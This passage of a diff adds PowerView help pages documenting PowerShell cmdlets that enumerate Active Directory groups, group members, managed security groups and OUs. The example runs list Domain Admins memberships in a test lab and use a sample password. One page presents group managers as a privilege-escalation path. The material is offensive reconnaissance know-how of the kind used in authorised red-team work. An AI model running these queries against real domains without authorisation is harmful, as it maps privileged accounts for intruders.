+Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GPOLocalGroupMapping + +A custom PSObject containing any target identity information and what local +group memberships they're a part of through GPO correlation. + +## NOTES + +## RELATED LINKS + +[http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/](http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/) + diff --git a/docs/Recon/Get-DomainGroup.md b/docs/Recon/Get-DomainGroup.md new file mode 100755 index 00000000..faaa0824 --- /dev/null +++ b/docs/Recon/Get-DomainGroup.md @@ -0,0 +1,397 @@ +# Get-DomainGroup + +## SYNOPSIS +Return all groups or specific group objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainGroup [[-Identity] ] [-MemberIdentity ] [-AdminCount] [-Domain ] + [-LDAPFilter ] [-Properties ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] + [-Tombstone] [-FindOne] [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all group objects for +the current domain are returned. +To return the groups a specific user/group is +a part of, use -MemberIdentity X to execute token groups enumeration. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGroup | select samaccountname +``` + +samaccountname +-------------- +WinRMRemoteWMIUsers__ +Administrators +Users +Guests +Print Operators +Backup Operators +... + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainGroup *admin* | select distinguishedname +``` + +distinguishedname +----------------- +CN=Administrators,CN=Builtin,DC=testlab,DC=local +CN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local +CN=Schema Admins,CN=Users,DC=testlab,DC=local +CN=Enterprise Admins,CN=Users,DC=testlab,DC=local +CN=Domain Admins,CN=Users,DC=testlab,DC=local +CN=DnsAdmins,CN=Users,DC=testlab,DC=local +CN=Server Admins,CN=Users,DC=testlab,DC=local +CN=Desktop Admins,CN=Users,DC=testlab,DC=local + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl +``` + +samaccountname +-------------- +Server Admins + +### -------------------------- EXAMPLE 4 -------------------------- +``` +'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose +``` + +VERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local +VERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local))) + +usncreated : 13245 +grouptype : -2147483646 +samaccounttype : 268435456 +samaccountname : Desktop Admins +whenchanged : 8/10/2016 12:30:30 AM +objectsid : S-1-5-21-890171859-3433809279-3366196753-1118 +objectclass : {top, group} +cn : Desktop Admins +usnchanged : 13255 +dscorepropagationdata : 1/1/1601 12:00:00 AM +name : Desktop Admins +distinguishedname : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +member : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +whencreated : 8/10/2016 12:29:43 AM +instancetype : 4 +objectguid : f37903ed-b333-49f4-abaa-46c65e9cca71 +objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local + +### -------------------------- EXAMPLE 5 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGroup -Credential $Cred + +### -------------------------- EXAMPLE 6 -------------------------- +``` +Get-Domain | Select-Object -Expand name +``` + +testlab.local + +'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainGroup\] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins' +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainGroup\] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins))) + +distinguishedname +----------------- +CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +Group1), DistinguishedName (e.g. +CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to query for. +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -MemberIdentity +A SamAccountName (e.g. +Group1), DistinguishedName (e.g. +CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the user/group member to query for group membership. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: UserName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AdminCount +Switch. +Return users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Group + +Custom PSObject with translated group property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainGroupMember.md b/docs/Recon/Get-DomainGroupMember.md new file mode 100755 index 00000000..5381b2cd --- /dev/null +++ b/docs/Recon/Get-DomainGroupMember.md @@ -0,0 +1,401 @@ +# Get-DomainGroupMember + +## SYNOPSIS +Return the members of a specific domain group. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID + +## SYNTAX + +### None (Default) +``` +Get-DomainGroupMember [-Identity] [-Domain ] [-LDAPFilter ] [-SearchBase ] + [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] + [-SecurityMasks ] [-Tombstone] [-Credential ] +``` + +### ManualRecurse +``` +Get-DomainGroupMember [-Identity] [-Domain ] [-Recurse] [-LDAPFilter ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-Credential ] +``` + +### RecurseUsingMatchingRule +``` +Get-DomainGroupMember [-Identity] [-Domain ] [-RecurseUsingMatchingRule] + [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] + [-Credential ] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for the specified +group matching the criteria. +Each result is then rebound and the full user +or group object is returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGroupMember "Desktop Admins" +``` + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : Testing Group +MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberObjectClass : group +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +'Desktop Admins' | Get-DomainGroupMember -Recurse +``` + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : Testing Group +MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberObjectClass : group +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129 + +GroupDomain : testlab.local +GroupName : Testing Group +GroupDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : harmj0y +MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112 + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule +``` + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : harmj0y +MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112 + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember +``` + +### -------------------------- EXAMPLE 5 -------------------------- +``` +'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember +``` + +### -------------------------- EXAMPLE 6 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGroupMember -Credential $Cred -Identity 'Domain Admins' + +### -------------------------- EXAMPLE 7 -------------------------- +``` +Get-Domain | Select-Object -Expand name +``` + +testlab.local + +'dev\domain admins' | Get-DomainGroupMember -Verbose +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainGroupMember\] Extracted domain 'dev.testlab.local' from 'dev\domain admins' +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainGroupMember\] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins))) +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local))) + +GroupDomain : dev.testlab.local +GroupName : Domain Admins +GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local +MemberDomain : dev.testlab.local +MemberName : user1 +MemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-339048670-1233568108-4141518690-201108 + +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local))) +GroupDomain : dev.testlab.local +GroupName : Domain Admins +GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local +MemberDomain : dev.testlab.local +MemberName : Administrator +MemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-339048670-1233568108-4141518690-500 + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +Group1), DistinguishedName (e.g. +CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to query for. +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Recurse +Switch. +If the group member is a group, recursively try to query its members as well. + +```yaml +Type: SwitchParameter +Parameter Sets: ManualRecurse +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RecurseUsingMatchingRule +Switch. +Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse. +Much faster than manual recursion, but doesn't reveal cross-domain groups, +and only returns user accounts (no nested group objects themselves). + +```yaml +Type: SwitchParameter +Parameter Sets: RecurseUsingMatchingRule +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GroupMember + +Custom PSObject with translated group member property fields. + +## NOTES + +## RELATED LINKS + +[http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/](http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/) + diff --git a/docs/Recon/Get-DomainManagedSecurityGroup.md b/docs/Recon/Get-DomainManagedSecurityGroup.md new file mode 100755 index 00000000..13d48a24 --- /dev/null +++ b/docs/Recon/Get-DomainManagedSecurityGroup.md @@ -0,0 +1,177 @@ +# Get-DomainManagedSecurityGroup + +## SYNOPSIS +Returns all security groups in the current (or target) domain that have a manager set. + +Author: Stuart Morgan (@ukstufus) \, Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl + +## SYNTAX + +``` +Get-DomainManagedSecurityGroup [[-Domain] ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] +``` + +## DESCRIPTION +Authority to manipulate the group membership of AD security groups and distribution groups +can be delegated to non-administrators by setting the 'managedBy' attribute. +This is typically +used to delegate management authority to distribution groups, but Windows supports security groups +being managed in the same way. + +This function searches for AD groups which have a group manager set, and determines whether that +user can manipulate group membership. +This could be a useful method of horizontal privilege +escalation, especially if the manager can manipulate the membership of a privileged group. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv +``` + +Store a list of all security groups with managers in group-managers.csv + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ManagedSecurityGroup + +A custom PSObject describing the managed security group. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainOU.md b/docs/Recon/Get-DomainOU.md new file mode 100755 index 00000000..cc1fd39c --- /dev/null +++ b/docs/Recon/Get-DomainOU.md @@ -0,0 +1,316 @@ +# Get-DomainOU + +## SYNOPSIS +Search for all organization units (OUs) or specific OU objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainOU [[-Identity] ] [-GPLink ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties whencreated,usnchanged,...". +By default, all OU objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainOU +``` + +Returns the current OUs in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainOU *admin* -Domain testlab.local +``` + +Returns all OUs with "admin" in their name in the testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" +``` + +Returns all OUs with linked to the specified group policy object. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +"*admin*","*server*" | Get-DomainOU +``` + +Search for OUs with the specific names. + +### -------------------------- EXAMPLE 5 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainOU -Credential $Cred + +## PARAMETERS + +### -Identity +An OU name (e.g. +TestOU), DistinguishedName (e.g. +OU=TestOU,DC=testlab,DC=local), or +GUID (e.g. +8a9ba22a-8977-47e6-84ce-8c26af4e1e6a). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -GPLink +Only return OUs with the specified GUID in their gplink property. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: GUID + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.OU + +Custom PSObject with translated OU property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainObject.md b/docs/Recon/Get-DomainObject.md new file mode 100755 index 00000000..f900c539 --- /dev/null +++ b/docs/Recon/Get-DomainObject.md @@ -0,0 +1,318 @@ +# Get-DomainObject + +## 